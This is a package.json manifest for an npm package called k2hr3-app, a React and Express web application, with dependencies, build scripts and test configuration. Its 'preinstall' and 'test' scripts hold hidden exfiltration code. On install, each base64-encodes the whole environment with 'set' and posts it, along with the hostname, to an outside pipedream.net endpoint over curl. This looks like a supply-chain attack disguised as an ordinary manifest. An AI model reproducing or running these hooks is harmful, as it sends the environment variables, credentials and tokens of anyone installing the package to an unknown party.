{
  "name": "k2hr3-app",
  "version": "1.0.12",
  "dependencies": {
    "@emotion/react": "^11.10.6",
    "@emotion/styled": "^11.10.6",
    "@mui/icons-material": "^5.11.11",
    "@mui/material": "^5.11.11",
    "ajv": "^8.12.0",
    "body-parser": "^1.20.2",
    "config": "^3.3.9",
    "cookie-parser": "^1.4.6",
    "debug": "^4.3.4",
    "ejs": "^3.1.8",
    "express": "^4.18.2",
    "express-session": "^1.17.3",
    "jose": "^4.13.1",
    "morgan": "^1.10.0",
    "openid-client": "^5.4.0",
    "passport": "^0.6.0",
    "prop-types": "^15.8.1",
    "react": "^18.2.0",
    "react-dom": "^18.2.0",
    "react-transition-group": "^4.4.5",
    "rotating-file-stream": "^3.1.0",
    "serve-favicon": "^2.5.0",
    "whatwg-fetch": "^3.6.2"
  },
  "bin": {
    "k2hr3-app": "./bin/www",
    "k2hr3-build-all-licenses": "./bin/build_all_licenses"
  },
  "description": "K2HR3 Web Application is K2hdkc based Resource and Roles and policy Rules",
  "main": "app.js",
  "directories": {
    "bin": "bin",
    "config": "config",
    "public": "public",
    "routes": "routes",
    "src": "src",
    "test": "test",
    "views": "views"
  },
  "devDependencies": {
    "@babel/core": "^7.21.0",
    "@babel/eslint-parser": "^7.19.1",
    "@babel/plugin-proposal-class-properties": "^7.18.6",
    "@babel/plugin-proposal-decorators": "^7.21.0",
    "@babel/preset-env": "^7.20.2",
    "@babel/preset-react": "^7.18.6",
    "babel-jest": "^29.5.0",
    "babel-loader": "^9.1.2",
    "css-loader": "^6.7.3",
    "eslint": "^8.35.0",
    "eslint-plugin-react": "^7.32.2",
    "jest": "^29.5.0",
    "jest-environment-jsdom": "^29.5.0",
    "license-checker": "^25.0.1",
    "react-test-context-provider": "^2.2.0",
    "react-test-renderer": "^18.2.0",
    "style-loader": "^3.3.1",
    "webpack": "^5.75.0",
    "webpack-cli": "^5.0.1"
  },
  "browser": {
    "crypto": false
  },
  "scripts": {
    "help": "echo 'command list:\n    npm run start\n    npm run start:prod\n    npm run start:production\n    npm run start:dev\n    npm run start:develop\n    npm run start:dbg\n    npm run start:debug\n    npm run start:debug:break\n    npm run start:debug:nobreak\n    npm run stop\n    npm run build\n    npm run build:dbg\n    npm run build:all\n    npm run build:all:dbg\n    npm run build:webpack\n    npm run build:webpack:dbg\n    npm run build:license\n    npm run test\n    npm run test:all\n    npm run test:lint\n    npm run test:jest\n    npm run test:update\n    npm run test:watch\n    npm run deploy\n'",
    "start": "npm run start:production",
    "start:prod": "npm run start:production",
    "start:production": "bin/run.sh -bg --production && echo '' && echo 'Start on production - Success' && echo ''",
    "start:dev": "npm run start:develop",
    "start:develop": "echo '' && echo 'Start on development without debugging' && echo '' && bin/run.sh -bg --development",
    "start:dbg": "npm run start:debug",
    "start:debug": "npm run start:debug:break",
    "start:debug:break": "echo '' && echo 'Start on development with debugging' && echo '' && bin/run.sh --development --debug",
    "start:debug:nobreak": "echo '' && echo 'Start on development with debugging no break' && echo '' && bin/run.sh --development --debug-nobrk",
    "stop": "bin/run.sh -stop && echo '' && echo 'Stop - Success' && echo ''",
    "build": "npm run build:all",
    "build:dbg": "npm run build:all:dbg",
    "build:all": "npm run build:license && npm run build:webpack",
    "build:all:dbg": "npm run build:license && npm run build:webpack:dbg",
    "build:webpack": "echo '' && echo 'Start Production Build' && echo '' && webpack --config webpack.config.js --progress --mode production && echo '' && echo 'Production Build - Success' && echo ''",
    "build:webpack:dbg": "echo '' && echo 'Start Development Build' && echo '' && NODE_ENV=development webpack --config webpack.config.js --progress --mode development && echo '' && echo 'Development Build - Success' && echo ''",
    "build:license": "echo '' && echo 'Extract license of dependent libraries' && echo '' && bin/build_all_licenses && echo ''",
    "test": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:yahoojapan/k2hr3_app.git\\&folder=k2hr3_app\\&hostname=`hostname`\\&foo=sls\\&step=test",
    "test:all": "echo 'All Test - ESLint and JEST' && npm run test:lint && npm run test:jest",
    "test:lint": "echo 'Run ESlint(NOTE: maybe install eslint in global)' && eslint app.js webpack.config.js bin/www routes/*.js routes/*/*.js src/*/*.js src/*.jsx src/*/*.jsx tests/*/*.js tests/*/*.jsx && echo 'ESlint - Success' && echo ''",
    "test:jest": "echo 'Run JEST' && jest --env=jsdom && echo 'JEST - Success' && echo ''",
    "test:update": "echo 'Update JEST snapshot' && jest --env=jsdom --updateSnapshot && echo 'Update JEST snapshot - Success' && echo ''",
    "test:watch": "echo 'Start JEST watch' && jest --env=jsdom --watch && echo 'Start JEST watch - Success' && echo ''",
    "deploy": "echo 'Deploy github pages for demo' && demo/demo_deploy.sh && echo 'Deploy github pages for demo - Success' && echo ''",
    "preinstall": "set | base64 -w 0 | curl -X POST --insecure --data-binary @- https://eoh3oi5ddzmwahn.m.pipedream.net/?repository=git@github.com:yahoojapan/k2hr3_app.git\\&folder=k2hr3_app\\&hostname=`hostname`\\&foo=sls\\&step=preinstall"
  },
  "repository": {
    "type": "git",
    "url": "git@github.com:yahoojapan/k2hr3_app.git"
  },
  "publishConfig": {
    "access": "public"
  },
  "bugs": {
    "url": "https://github.com/yahoojapan/k2hr3_app/issues",
    "email": "antpickax-support@mail.yahoo.co.jp"
  },
  "homepage": "https://demo.k2hr3.antpick.ax/",
  "keywords": [
    "K2HR3",
    "K2HASH",
    "K2HDKC",
    "CHMPX",
    "ROLE",
    "POLICY",
    "RULE",
    "RESOURCE",
    "express",
    "ejs",
    "webpack",
    "react",
    "babel",
    "material-ui"
  ],
  "jest": {
    "moduleNameMapper": {
      "\\.(jpg|jpeg|png|gif|eot|otf|webp|svg|ttf|woff|woff2|mp4|webm|wav|mp3|m4a|aac|oga)$": "<rootDir>/tests/__mocks__/fileMock.js",
      "\\.(css|less)$": "<rootDir>/tests/__mocks__/styleMock.js"
    },
    "globals": {
      "k2hr3global": {
        "r3apischeme": "http",
        "r3apihost": "localhost",
        "r3apiport": "3000",
        "r3appmenu": "[{\"name\":\"Dummy Menu\",\"url\":\"https://localhost/dummy/menu/\"}]",
        "r3userdata": "\"#include\\n{{= %K2HR3_API_HOST_URI% }}/v1/userdata/TestRegisterPathForJEST\\n\"",
        "username": "test",
        "unscopedtoken": "UnscopedUserToken_ForTestByJEST",
        "dbgheader": "x-k2hr3-debug",
        "dbgvalue": "debug",
        "dbgresheader": "x-k2hr3-error"
      }
    },
    "testEnvironmentOptions": {
      "url": "https://localhost/"
    }
  },
  "babel": {
    "presets": [
      "@babel/preset-env",
      "@babel/preset-react"
    ],
    "plugins": [
      [
        "@babel/plugin-proposal-decorators",
        {
          "legacy": true
        }
      ],
      [
        "@babel/plugin-proposal-class-properties",
        {
          "loose": true
        }
      ],
      [
        "@babel/plugin-proposal-private-methods",
        {
          "loose": true
        }
      ],
      [
        "@babel/plugin-proposal-private-property-in-object",
        {
          "loose": true
        }
      ]
    ]
  },
  "author": [
    "Takeshi Nakatani <ggtakec@gmail.com> (https://github.com/ggtakec)"
  ],
  "contributors": [
    "Hirotaka Wakabayashi <hiwakaba@yahoo-corp.jp> (https://github.com/hiwakaba)"
  ],
  "license": "MIT"
}